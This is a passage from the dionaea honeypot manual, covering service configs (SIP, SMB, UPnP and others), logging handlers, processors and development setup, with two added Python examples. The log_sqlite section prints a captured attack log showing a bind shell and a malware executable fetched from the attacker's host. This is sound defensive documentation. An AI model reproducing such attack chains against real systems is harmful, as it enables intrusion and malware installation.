860          iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
861          iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5
862
863       Explanation:
864
865          1. ACCEPT all connections to existing services
866
867          2. enqueue all other packets to the NFQUEUE
868
869       If you have dionaea running on your NAT router, I  recommend  something
870       like:
871
872          iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
873          iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
874          iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE
875
876       Explanation:
877
878          1. ACCEPT all connections to existing services in mangle::PREROUTING
879
880          2. MARK all other packets
881
882          3. if we see these marked packets on INPUT, queue them
883
884       Using something like:
885
886          iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5
887
888       will  enqueue  /all/  SYN packets to the NFQUEUE, once you stop dionaea
889       you will not even be able to connect to your ssh daemon.
890
891       Even if you add an exemption for ssh like:
892
893          iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE
894
895       dionaea will try to create a new service for /every/  incoming  connec‐
896       tion,  even  if  there  is a service running already.  As it is easy to
897       avoid this, I recommend sticking with the recommendation.  Besides  the
898       already mentioned throttle settings, there are various timeouts for the
899       nfq mirror service in the config.  You can control how long the service
900       will  wait for new connections (/timeouts.server.listen/), and how long
901       the mirror connection will be idle (/timeouts.client.idle/) and sustain
902       (/timeouts.client.sustain/).
903
904   PPTP
905   Example config
906       services/pptp.yaml
907
908          - name: pptp
909            config:
910          # Cisco PIX
911          #    firmware_revision: 4608
912          #    hostname:
913          #    vendor_name: Cisco Systems
914
915          # DrayTek
916          #    firmware_revision: 1
917          #    hostname: Vigor
918          #    vendor_name: DrayTek
919
920          # Linux
921          #    firmware_revision: 1
922          #    hostname: local
923          #    vendor_name: linux
924
925          # Windows
926          #    firmware_revision: 0
927          #    hostname:
928          #    vendor_name: Microsoft
929
930          # MikroTik router
931          #    firmware_revision: 1
932          #    hostname: MikroTik
933          #    vendor_name: MikroTik
934
935
936   SIP (VoIP)
937       This  is a VoIP module for the honeypot dionaea. The VoIP protocol used
938       is SIP since it is the de facto standard for VoIP today. In contrast to
939       some  other  VoIP honeypots, this module doesn’t connect to an external
940       VoIP registrar/server. It simply waits for incoming SIP messages  (e.g.
941       OPTIONS or even INVITE), logs all data as honeypot incidents and/or bi‐
942       nary data dumps (RTP traffic), and reacts accordingly, for instance  by
943       creating a SIP session including an RTP audio channel. As sophisticated
944       exploits within the SIP payload are not very common yet,  the  honeypot
945       module  doesn’t  pass any code to dionaea’s code emulation engine. This
946       will be implemented if we spot such malicious messages. The  main  fea‐
947       tures of the VoIP module are:
948
949       • Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)
950
951       • Support for multiple SIP sessions and RTP audio streams
952
953       • Record all RTP data (optional)
954
955       • Set custom SIP username and secret (password)
956
957       • Set custom useragent to mimic different phone models
958
959       • Uses dionaea’s incident system to log to SQL database
960
961   Personalities
962       A  personality  defines how to handle a request. At least the ‘default’
963       personality MUST exist. The following options are available per person‐
964       ality.
965
966       serve
967          A list of IP addresses to use this personality for.
968
969       handle
970          List of SIP methods to handle.
971
972   SIP Users
973       You  can  easily add, change or remove users by editing the SQLite file
974       specified by the ‘users = “”’ parameter in the config file.  All  users
975       are specified in the users table.
976
977       username
978          Specifies the name of the user.  This value is treated as a regular
979          expression.  See Python: Regular Expressions
980          <http://docs.python.org/py3k/library/re.html> for more information.
981
982       password
983          The password.
984
985       personality
986          The  user  is  only  available  in the personality specified by this
987          value. You can define a personality in the config file.
988
989       pickup_delay_min
990          This is an integer value. Let the phone ring for at least this  num‐
991          ber of seconds.
992
993       pickup_delay_max
994          This  is  an integer value. Maximum number of seconds to wait before
995          dionaea picks up the phone.
996
997       action
998          This value isn’t in use, yet.
999
1000       sdp
1001          The name of the SDP to use. See table ‘sdp’.
1002
1003   SDP
1004       All SDPs can be defined in the sdp table in the users database.
1005
1006       name
1007          Name of the SDP
1008
1009       sdp
1010          The value to use as SDP
1011
1012       The following values are available in the SDP definition.
1013
1014       {addrtype}
1015          Address type. (IP4 or IP6)
1016
1017       {unicast_address}
1018          RTP address
1019
1020       {audio_port}
1021          Dionaea audio port.
1022
1023       {video_port}
1024          Dionaea video port.
1025
1026       The following control parameters are available in the SDP definition.
1027
1028       [audio_port]…content…[/audio_port]
1029          The content is only available in the output if the audio_port  value
1030          is set.
1031
1032       [video_port]…content…[/video_port]
1033          The  content is only available in the output if the video_port value
1034          is set.
1035
1036       Example:
1037
1038          v=0
1039          o=- 1304279835 1 IN {addrtype} {unicast_address}
1040          s=SIP Session
1041          c=IN {addrtype} {unicast_address}
1042          t=0 0
1043          [audio_port]
1044          m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
1045          a=sendrecv
1046          a=rtpmap:111 Speex/16000/1
1047          a=fmtp:111 sr=16000,mode=any
1048          a=rtpmap:0 PCMU/8000/1
1049          a=rtpmap:8 PCMA/8000/1
1050          a=rtpmap:9 G722/8000/1
1051          a=rtpmap:101 telephone-event/8000
1052          a=fmtp:101 0-16,32,36
1053          a=rtpmap:120 NSE/8000
1054          a=fmtp:120 192-193
1055          [/audio_port]
1056          [video_port]
1057          m=video {video_port} RTP/AVP 34 96 97
1058          c=IN {addrtype} {unicast_address}
1059          a=rtpmap:34 H263/90000
1060          a=fmtp:34 QCIF=2
1061          a=rtpmap:96 H263-1998/90000
1062          a=fmtp:96 QCIF=2
1063          a=rtpmap:97 H263-N800/90000
1064          [/video_port]
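       An added example (not dionaea's code) of rendering such an SDP defini‐
       tion: the {placeholders} are substituted, and the [audio_port]…[/au‐
       dio_port] and [video_port]…[/video_port] blocks are kept only when the
       corresponding port is set.  The function name render_sdp and the RTP
       addresses and ports are assumptions; the template is the example
       above, shortened.

```python
import ipaddress
import re

# The SDP definition from the example above, shortened to the lines needed here.
SDP_TEMPLATE = """v=0
o=- 1304279835 1 IN {addrtype} {unicast_address}
s=SIP Session
c=IN {addrtype} {unicast_address}
t=0 0
[audio_port]
m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
a=sendrecv
a=rtpmap:111 Speex/16000/1
a=rtpmap:0 PCMU/8000/1
a=rtpmap:8 PCMA/8000/1
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16,32,36
[/audio_port]
[video_port]
m=video {video_port} RTP/AVP 34 96 97
c=IN {addrtype} {unicast_address}
a=rtpmap:34 H263/90000
a=fmtp:34 QCIF=2
[/video_port]
"""

# A control block: [name] ... [/name] with the same name on both ends.
_BLOCK_RE = re.compile(r"\[(audio_port|video_port)\]\n?(.*?)\[/\1\]\n?", re.DOTALL)


def render_sdp(template, unicast_address, audio_port=None, video_port=None):
    """Render an SDP definition for one session.

    Control blocks whose port is None are removed together with their
    content; the remaining {placeholders} are filled in.  addrtype is
    derived from the RTP address (IP4 or IP6).
    """
    ports = {"audio_port": audio_port, "video_port": video_port}

    def keep_or_drop(match):
        name, body = match.group(1), match.group(2)
        return body if ports[name] is not None else ""

    text = _BLOCK_RE.sub(keep_or_drop, template)
    version = ipaddress.ip_address(unicast_address).version
    return text.format(
        addrtype="IP4" if version == 4 else "IP6",
        unicast_address=unicast_address,
        audio_port=audio_port,
        video_port=video_port,
    )


if __name__ == "__main__":
    # constructed RTP address and port: audio only, so the video block is dropped
    print(render_sdp(SDP_TEMPLATE, "192.0.2.10", audio_port=5004))
```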
1065
1066   Example config
1067       services/sip.yaml
1068
1069          - name: sip
1070            config:
1071              udp_ports:
1072                - 5060
1073              tcp_ports:
1074                - 5060
1075              tls_ports:
1076                - 5061
1077              users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
1078              rtp:
1079                enable: true
1080                # how to dump the rtp stream
1081                # bistream = dump as bistream
1082                modes:
1083                  - bistream
1084                  - pcap
1085                pcap:
1086                  path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
1087                  filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
1088              personalities:
1089                default:
1090                  domain: "localhost"
1091                  name: "softphone"
1092                  personality: "generic"
1093          #      next-server:
1094          #        domain: "my-domain"
1095          #        name: "my server"
1096          #        personality: "generic"
1097          #        serve: ["10.0.0.1"]
1098          #        default_sdp: "default"
1099          #        handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]
1100
1101              actions:
1102                bank-redirect:
1103                  do: "redirect"
1104                  params:
1105                play-hello:
1106                  do: "play"
1107                  params:
1108                    file: "var/dionaea/.../file.ext"
1109
1110
1111   SMB
1112       The main protocol offered by dionaea is SMB.  SMB has a decent history
1113       of remotely exploitable bugs, and is a very popular target for worms.
1114       dionaea's SMB implementation makes use of a python3 adapted version of
1115       scapy.  As scapy's own version of SMB was pretty limited, almost every‐
1116       thing but the Field declarations had to be rewritten.  The SMB emula‐
1117       tion written for dionaea is used by the mwcollectd
1118       <http://code.mwcollect.org> low interaction honeypot too.  Besides the
1119       known attacks on SMB, dionaea supports uploading files to smb shares.
1120       Adding new DCE remote procedure calls is a good start to get into the
1121       dionaea code; you can use:
1122
1123          SELECT
1124                  COUNT(*),
1125                  dcerpcrequests.dcerpcrequest_uuid,
1126                  dcerpcservice_name,
1127                  dcerpcrequest_opnum
1128          FROM
1129                  dcerpcrequests
1130                  JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
1131                  LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
1132          WHERE
1133                  dcerpcserviceop_name IS NULL
1134          GROUP BY
1135                  dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
1136          ORDER BY
1137                  COUNT(*) DESC;
1138
1139       to identify potentially useful targets of unknown dcerpc calls using the
1140       data you gathered and stored in your logsql database.  Patches are ap‐
1141       preciated.
1142
1143   Example config
1144       services/smb.yaml
1145
1146          - name: smb
1147            config:
1148
1149              ## Generic setting ##
1150
1151              # 1:"Windows XP Service Pack 0/1",
1152              # 2:"Windows XP Service Pack 2",
1153              # 3:"Windows XP Service Pack 3",
1154              # 4:"Windows 7 Service Pack 1",
1155              # 5:"Linux Samba 4.3.11"
1156          #    os_type: 2
1157
1158               # Additional config
1159          #    primary_domain: Test
1160          #    oem_domain_name: Test
1161          #    server_name: TEST-SERVER
1162
1163               ## Windows 7 ##
1164          #    native_os: Windows 7 Professional 7600
1165          #    native_lan_manager: Windows 7 Professional 6.1
1166          #    shares:
1167          #      ADMIN$:
1168          #        comment: Remote Admin
1169          #        path: C:\\Windows
1170          #        type: disktree
1171          #      C$:
1172          #        comment: Default Share
1173          #        path: C:\\
1174          #        type:
1175          #          - disktree
1176          #          - special
1177          #      IPC$:
1178          #        comment: Remote IPC
1179          #        type: ipc
1180          #      Printer:
1181          #        comment: Microsoft XPS Document Writer
1182          #        type: printq
1183
1184               ## Samba ##
1185          #    native_os: Windows 6.1
1186          #    native_lan_manager: Samba 4.3.11
1187          #    shares:
1188          #      admin:
1189          #        comment: Remote Admin
1190          #        path: \\home\\admin
1191          #        type: disktree
1192          #      share:
1193          #        comment: Default Share
1194          #        path: \\share
1195          #        type: disktree
1196          #      IPC$:
1197          #        comment: Remote IPC
1198          #        path: IPC Service
1199          #        type: ipc
1200          #      Printer:
1201          #        comment: Printer Drivers
1202          #        type: printq
1203
1204
1205   TFTP
1206       Written to test the udp connection code, dionaea provides a tftp server
1207       on port 69, which can serve files.  Even though there were vulnerabil‐
1208       ities in tftp services, I have yet to see an automated attack on tftp
1209       services.
1210
1211   Example config
1212       services/tftp.yaml
1213
1214          - name: tftp
1215            config:
1216              root: /var/lib/dionaea/roots/tftp
1217
1218
1219   UPnP
1220   Example config
1221       services/upnp.yaml
1222
1223          - name: upnp
1224            config:
1225              root: /var/lib/dionaea/roots/upnp
1226              # maximum size in kbytes of the request (32MB)
1227              max_request_size: 32768
1228              personality:
1229                # default
1230                cache:    "CACHE-CONTROL: max-age=120\r\n"
1231                st:       "ST: upnp:rootdevice\r\n"
1232                usn:      "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
1233                server:   "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
1234                location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
1235                opt:      "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1236          #      # Samsung TV
1237          #      cache:     "CACHE-CONTROL: max-age=900\r\n"
1238          #      st:        "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1239          #      usn:       "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1240          #      server:    "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
1241          #      location:  "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
1242          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1243          #
1244          #      # XBOX 360
1245          #      cache:     "CACHE-CONTROL: max-age=1800\r\n"
1246          #      st:        "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1247          #      usn:       "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1248          #      server:    "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
1249          #      location:  "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
1250          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1251
1252

LOGGING (IHANDLER)

1254       Getting a copy of the malware is cool, getting an overview of  the  at‐
1255       tacks run on your sensor is priceless.
1256
1257       dionaea can write information to a text file, but be aware, dionaea's
1258       logging to text files is rather chatty, really chatty, and you do not
1259       want to look at the information, if you are not debugging the software
1260       or writing some new feature for it.
1261
1262       Of course, you can apply filters to the logging, to limit it to differ‐
1263       ent facilities or levels, but in general you do not want to work with
1264       text files.
1265
1266       dionaea uses an internal communication system which is called inci‐
1267       dents.  An incident has an origin, which is a string (a path), and
1268       properties, which can be integers, strings, or a pointer to a connec‐
1269       tion.  Incidents are kept minimal: they pass only the information re‐
1270       quired to incident handlers (ihandler).  An ihandler can register a
1271       path for incidents it wants to get informed about; the paths are
1272       matched in a glob-like fashion.  Therefore logging information using an
1273       ihandler is superior to text logging: you get the information you are
1274       looking for, and can write it to a format you choose yourself.
1275
1276       List of available ihandlers
1277
1278   emuprofile
1279   Example config
1280       ihandlers/emuprofile.yaml
1281
1282          - name: emuprofile
1283
1284
1285   fail2ban
1286   Example config
1287       ihandlers/fail2ban.yaml
1288
1289          - name: fail2ban
1290            config:
1291              downloads: "/var/lib/dionaea/downloads.f2b"
1292              offers: "/var/lib/dionaea/offers.f2b"
1293
1294
1295   ftp
1296   Example config
1297       ihandlers/ftp.yaml
1298
1299          # ftp client section
1300          - name: ftp
1301            config:
1302              # host for active ftp via NAT
1303              # * 0.0.0.0 - the initiating connection ip is used for active ftp
1304              # * not 0.0.0.0 - gets resolved as hostname and used
1305              active_host: "0.0.0.0"
1306
1307              # ports for active ftp; string indicating a range
1308              active_ports: 63001-64000
1309
1310
1311   hpfeeds
1312   Example config
1313       ihandlers/hpfeeds.yaml
1314
1315          - name: hpfeeds
1316            config:
1317              server: "hpfriends.honeycloud.net"
1318              port: 10000
1319              ident: ""
1320              secret: ""
1321              # dynip_resolve: enable to lookup the sensor ip through a webservice
1322              dynip_resolve: "http://hpfriends.honeycloud.net/ip"
1323
1324
1325   log_db_sql
1326       WARNING:
1327          This ihandler is experimental.
1328
1329       This incident handler can write interesting information  about  attacks
1330       and  connections  into  an SQL database.  It uses SQLAlchemy to support
1331       different databases.
1332
1333   Example config
1334       ihandlers/log_db_sql.yaml
1335
1336          - name: log_db_sql
1337            config:
1338              url: sqlite:////var/lib/dionaea/dionaea.db
1339
1340
1341   log_incident
1342       This ihandler can be used to export incidents in realtime  to  be  pro‐
1343       cessed by external programs.
1344
1345       WARNING:
1346          This  ihandler  is in pre alpha state and it might be changed or re‐
1347          moved in the future.
1348
1349   Configure
1350       handlers
1351          List of URLs to submit the information to.  At the moment only file,
1352          http and https are supported.
1353
1354   Format
1355          {
1356             "name": "<sensor-name>",
1357             "origin": "<name of the incident>",
1358             "timestamp": "<date in ISO 8601>",
1359             "data": {
1360                "connection": {
1361                   "id": <internal ID>,
1362                   "local_ip": "<local IP>",
1363                   "local_port": <local port>,
1364                   "remote_ip": "<remote IP>",
1365                   "remote_hostname": "<remote hostname if resolvable>",
1366                   "remote_port": <remote port>,
1367                   "protocol": "<protocol>",
1368                   "transport": "<transport tcp|udp>"
1369                }
1370             }
1371          }
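       An added example (not dionaea's code) that models the incident system
       described in the introduction of this chapter together with the record
       format above: an ihandler registers a glob pattern, every incident
       whose origin matches is handed to it, and the handler turns incidents
       carrying a connection into log_incident records.  Incident, Incident‐
       Dispatcher, LogIncidentHandler and demo are invented names; the origin
       strings and connection values in the sample are constructed.

```python
import fnmatch
import json
from datetime import datetime, timezone


class Incident:
    """An incident: an origin (a dotted path) plus properties, which may be
    integers, strings or a reference to a connection (a dict here)."""

    def __init__(self, origin, **props):
        self.origin = origin
        self.props = props


class IncidentDispatcher:
    """ihandlers register a path pattern; origins are matched glob-like."""

    def __init__(self):
        self._handlers = []  # list of (pattern, handler)

    def register(self, pattern, handler):
        self._handlers.append((pattern, handler))

    def dispatch(self, incident):
        """Hand the incident to every matching ihandler; return how many."""
        delivered = 0
        for pattern, handler in self._handlers:
            if fnmatch.fnmatchcase(incident.origin, pattern):
                handler.handle(incident)
                delivered += 1
        return delivered


class LogIncidentHandler:
    """Collects records in the log_incident format shown above."""

    CONNECTION_FIELDS = ("id", "local_ip", "local_port", "remote_ip",
                         "remote_hostname", "remote_port", "protocol",
                         "transport")

    def __init__(self, sensor_name, clock=None):
        self.sensor_name = sensor_name
        self.clock = clock or (lambda: datetime.now(timezone.utc))
        self.records = []

    def handle(self, incident):
        con = incident.props.get("con")
        if con is None:  # assumption for this example: no connection, no record
            return
        self.records.append({
            "name": self.sensor_name,
            "origin": incident.origin,
            "timestamp": self.clock().isoformat(),  # ISO 8601
            "data": {"connection": {k: con.get(k) for k in self.CONNECTION_FIELDS}},
        })

    def json_lines(self):
        """One JSON document per record, e.g. for a file:// handler."""
        return [json.dumps(r, sort_keys=True) for r in self.records]


# Constructed sample connection (TEST-NET addresses).
SAMPLE_CONNECTION = {
    "id": 610, "local_ip": "192.0.2.10", "local_port": 445,
    "remote_ip": "198.51.100.7", "remote_hostname": "", "remote_port": 2010,
    "protocol": "smbd", "transport": "tcp",
}


def demo():
    """Register two ihandlers with different patterns, dispatch two
    constructed incidents and return what each handler saw."""
    fixed_clock = lambda: datetime(2020, 1, 1, tzinfo=timezone.utc)
    dispatcher = IncidentDispatcher()
    only_connections = LogIncidentHandler("sensor-1", clock=fixed_clock)
    everything = LogIncidentHandler("sensor-1", clock=fixed_clock)
    dispatcher.register("dionaea.connection.*", only_connections)
    dispatcher.register("dionaea.*", everything)
    # origin names chosen for the sample
    accept = Incident("dionaea.connection.tcp.accept", con=SAMPLE_CONNECTION)
    download = Incident("dionaea.download.complete", con=SAMPLE_CONNECTION,
                        path="<constructed path>")
    return {
        "accept_delivered": dispatcher.dispatch(accept),
        "download_delivered": dispatcher.dispatch(download),
        "only_connections": only_connections.records,
        "everything": everything.records,
        "lines": only_connections.json_lines(),
    }


if __name__ == "__main__":
    for line in demo()["lines"]:
        print(line)
```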
1372
1373   Example config
1374       ihandlers/log_incident.yaml
1375
1376          - name: log_incident
1377            config:
1378              handlers:
1379                #- http://127.0.0.1:8080/
1380                - file:///var/lib/dionaea/dionaea_incident.json
1381
1382
1383   log_json
1384       This  ihandler can submit information about attacks/connections encoded
1385       as json.
1386
1387       WARNING:
1388          This ihandler is in pre alpha state and it might be changed  or  re‐
1389          moved in the near future.
1390
1391   Configure
1392       flat_data
1393          Set to true to flatten object lists.
1394
1395       handlers
1396          List of URLs to submit the information to.  At the moment only file,
1397          http and https are supported.
1398
1399   Format
1400       Format of the connection information:
1401
1402          {
1403              "connection": {
1404                  "local": {
1405                      "address": "<string:local ip address>",
1406                      "port": <integer:local port>
1407                  },
1408                  "protocol": "<string:service name e.g. httpd>",
1409                  "remote": {
1410                      "address": "<string:remote ip address>",
1411                      "port": <integer:remote port>,
1412                      "hostname": "<string:hostname of the remote host>"
1413                  },
1414                  "transport": "<string:transport protocol e.g. tcp or udp>",
1415                  "type": "<string:connection type e.g. accepted, listen, ...>"
1416              }
1417          }
1418
1419   Example config
1420       ihandlers/log_json.yaml
1421
1422          - name: log_json
1423            config:
1424              # Uncomment next line to flatten object lists to work with ELK
1425              # flat_data: true
1426              handlers:
1427                #- http://127.0.0.1:8080/
1428                - file:///var/lib/dionaea/dionaea.json
1429
1430
1431   log_sqlite
1432       WARNING:
1433          This  ihandler  was  renamed  in  dionaea  0.4.0  from   logsql   to
1434          log_sqlite.
1435
1436       This is what the logsql python script does: it is an ihandler, and
1437       writes interesting incidents to a sqlite database.  One of the benefits
1438       of this logging is the ability to cluster incidents based on the ini‐
1439       tial attack when retrieving the data from the database:
1440
1441          connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
1442           dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
1443           p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1444           profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
1445                      ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
1446           service: bindshell://1957
1447           connection 611 remoteshell tcp listen 10.69.53.52:1957
1448             connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
1449               p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1450               offer: fxp://1:1@10.65.34.231:8218/ssms.exe
1451               download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
1452               connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
1453                 connection 614 ftpdata tcp listen 10.69.53.52:62087
1454                   connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
1455                     p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1456
1457       Additionally, you can query the database for many different things, re‐
1458       fer to:
1459
1460       • dionaea sql logging 2009/11/06
1461
1462       • post it yourself 2009/12/08
1463
1464       • sqlite performance 2009/12/12
1465
1466       • virustotal fun 2009/12/14
1467
1468       • Andrew Waite’s Blog for mimic-nepstats.py
1469
1470       for more examples how to make use of the database.
1471
1472   Example config
1473       ihandlers/log_sqlite.yaml
1474
1475          - name: log_sqlite
1476            config:
1477              file: /var/lib/dionaea/dionaea.sqlite
1478
1479
1480
1481   nfq
1482   Example config
1483       ihandlers/nfq.yaml
1484
1485          - name: nfq
1486            # nfq can intercept incoming tcp connections during the tcp handshake
1487            # giving your honeypot the possibility to provide service on
1488            # ports which are not served by default.
1489            # refer to the documentation BEFORE using this
1490            config:
1491              # 0 = DROP
1492              nfaction: 0
1493              throttle:
1494                window: 30
1495                limits:
1496                  total: 30
1497                  slot: 30
1498              timeouts:
1499                server:
1500                  listen: 5
1501                client:
1502                  idle: 10
1503                  sustain: 240
1504
1505
1506   p0f
1507   Example config
1508       ihandlers/p0f.yaml
1509
1510          - name: p0f
1511            config:
1512              # start p0f with
1513              # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
1514              path: "un:///tmp/p0f.sock"
1515
1516
1517   store
1518   Example config
1519       ihandlers/store.yaml
1520
1521          - name: store
1522
1523
1524   submit_http
1525   Example config
1526       ihandlers/submit_http.yaml
1527
1528          - name: submit_http
1529            config:
1530                # the url to send the submission requests to
1531                url: "http://example.org/"
1532                # E-Mail (optional)
1533                # email: ""
1534                # username (optional)
1535                # user:
1536                # password (optional)
1537                # pass:
1538
1539
1540   submit_http_post
1541   Example config
1542       ihandlers/submit_http_post.yaml
1543
1544          - name: submit_http_post
1545            config:
1546              submit:
1547                file_upload:
1548                  urls:
1549                    - http://example.org/upload
1550                    - http://example.com/file.php
1551                  field_values:
1552                    submit: "Upload file"
1553                  file_fieldname: upload_file
1554
1555
1556   tftp_download
1557   Example config
1558       ihandlers/tftp_download.yaml
1559
1560          - name: tftp_download
1561
1562
1563   VirusTotal
1564       This  ihandler  submits  the captured malware samples to the VirusTotal
1565       service for further analysis.
1566
1567   Configuration
1568       apikey
1569          The VirusTotal API-Key.
1570
1571       file
1572          SQLite database file used to cache the results.
1573
1574   Example config
1575       ihandlers/virustotal.yaml
1576
1577          - name: virustotal
1578            config:
1579              # grab it from your virustotal account at My account -> Inbox -> Public API
1580              apikey: "........."
1581              file: "/var/lib/dionaea/vtcache.sqlite"
1582
1583

PROCESSORS

1585       Processors control the actions done on the bi-directional streams we
1586       gain when getting attacked.  The default is to run the emu processor on
1587       them to detect shellcode.
1588
1589   Emu
1590       Use libemu to find and emulate shellcodes.
1591
1592   Configuration
1593   Filter
1594       Only continue with the processing pipeline if all conditions match.
1595
1596   Configuration
1597       protocols
1598          Comma separated list of connection types.
1599
1600       types
1601          Comma separated list of connection types.
1602
1603          • accept - dionaea accepts a new connection from a remote host
1604
1605          • connect - dionaea makes a connection to a remote host
1606
1607   Streamdumper
1608       This processor can dump a connection  as  bi-directional  stream.   The
1609       dump  can  be used to replay an attack on ip-level without messing with
1610       pcap and tcpreplay.
1611
1612   Configuration
1613       path
1614          Dumps will be created in this directory.
1615

CONTRIBUTING

1617       First of all, thank you for your interest in contributing to dionaea!
1618
1619   Filing bug reports
1620       Bug reports are very welcome.  Please file them  on  the  GitHub  issue
1621       tracker.   Good bug reports come with extensive descriptions of the er‐
1622       ror and how to reproduce it.
1623
1624   Patches
1625       All patches to dionaea should be submitted in the form of pull requests
1626       to the main dionaea repository, DinoTools/dionaea.  These pull requests
1627       should satisfy the following properties:
1628
1629   Code
1630       • The pull request should focus on one particular improvement to  dion‐
1631         aea.
1632
1633       • Create different pull requests for unrelated features or bugfixes.
1634
1635       • Python  code  should  follow  PEP  8, especially in the “do what code
1636         around you does” sense.
1637
1638   Documentation
1639       When introducing new functionality, please remember to write documenta‐
1640       tion.
1641
1642   Review
1643       Finally,  pull  requests must be reviewed before merging.  Everyone can
1644       perform reviews; this is a very valuable  way  to  contribute,  and  is
1645       highly encouraged.
1646

DEVELOPMENT

1648       dionaea's initial development was funded by the Honeynet Project as
1649       part of the Honeynets Summer of Code during 2009.  The development pro‐
1650       cess is as open as possible.  You can browse the source online and re‐
1651       port bugs on GitHub.
1652
1653   Development
1654   Vagrant
1655       Vagrant can be used to set up a development environment for dionaea
1656       within minutes.
1657
1658   Install
1659       First install Vagrant and VirtualBox.
1660
1661       If everything has been set up correctly, clone the git repository and
1662       use vagrant to bootstrap and start the environment.
1663
1664          $ git clone https://github.com/DinoTools/dionaea.git
1665          $ cd dionaea/vagrant
1666          $ vagrant up
1667
1668       All files will be installed in the /opt/dionaea directory.
1669
1670   Run
1671       Access the development environment, edit the  config  files  and  start
1672       dionaea with the following command.
1673
1674          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1675
1676   Rebuild and test
1677       To rebuild and install dionaea run the following commands.
1678
1679          $ cd /vagrant
1680          $ make
1681          $ sudo make install
1682
1683       See Run for more information on how to start dionaea.
1684
1685   Ubuntu 14.04
1686       Instead  of  using  Vagrant  you can use a Ubuntu 14.04 system to setup
1687       your development environment.  In this section we will use the  scripts
1688       used  to setup the Vagrant environment to bootstrap a fresh Ubuntu sys‐
1689       tem.  If you like you can follow the ‘From Source’ section of the
1690       installation guide to set up everything by hand.
1691
1692   Install
1693       First install Ubuntu.
1694
1695       If everything has been set up correctly, clone the git repository and
1696       run the bootstrap script from the vagrant directory.
1697
1698          $ git clone https://github.com/DinoTools/dionaea.git
1699          $ cd dionaea/vagrant
1700          $ ./bootstrap.sh
1701
1702       All files will be installed in the /opt/dionaea directory.
1703
1704   Rebuild and test
1705       Rebuild, install and start dionaea from the root of the git repository.
1706
1707          $ make
1708          $ sudo make install
1709          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710
1711       This can also be done in one line.
1712
1713          $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1714
1715   Find memory leaks
1716       To enable AddressSanitizer you have to add the following parameters  to
1717       the configure script and rebuild dionaea.
1718
1719          --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1720
1721       When  running  dionaea  it will print information about overflow errors.
1722       If you would like to stop execution you have to  export  an  additional
1723       environment variable.
1724
1725          export ASAN_OPTIONS='abort_on_error=1'
1726
1727       To  get  a  stacktrace you can use gdb and add an additional breakpoint
1728       break __asan_report_error.
1729
1730       It is also possible to use the asan_symbolize.py python2 script to ex‐
1731       tract additional information.
1732
